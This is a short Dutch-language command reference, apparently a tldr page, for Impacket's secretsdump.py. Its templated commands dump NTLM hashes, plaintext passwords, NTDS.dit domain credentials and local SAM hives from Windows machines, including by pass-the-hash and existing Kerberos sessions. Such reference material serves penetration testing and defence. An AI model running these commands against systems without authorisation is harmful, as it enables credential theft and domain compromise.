1.0 KiB
1.0 KiB
secretsdump.py
NTLM-hashes, wachtwoorden in platte tekst en domeingegevens van Windows-systemen op afstand downloaden. Onderdeel van de Impacket-suite. Meer informatie: https://github.com/fortra/impacket.
- Dump vertrouwelijke gegevens van een Windows machine met een gebruikersnaam en wachtwoord:
secretsdump.py {{domein}}/{{gebruikersnaam}}:{{wachtwoord}}@{{doel}}
- Dump hashes van een machine met pass-the-hash authenticatie:
secretsdump.py -hashes {{LM_Hash}}:{{NT_Hash}} {{domein}}/{{gebruikersnaam}}@{{doel}}
- Dump referenties van Active Directory's NTDS.dit bestand:
secretsdump.py -just-dc {{domein}}/{{gebruikersnaam}}:{{wachtwoord}}@{{doel}}
- Haal referenties uit een lokale SAM-database met behulp van registerhives:
secretsdump.py -sam {{pad/naar/SAM}} -system {{pad/naar/SYSTEM}}
- Dump hashes van een machine zonder een wachtwoord op te geven (als er een geldige authenticatiesessie bestaat, bijv. via Kerberos of NTLM SSO):
secretsdump.py -no-pass {{domein}}/{{gebruikersnaam}}@{{doel}}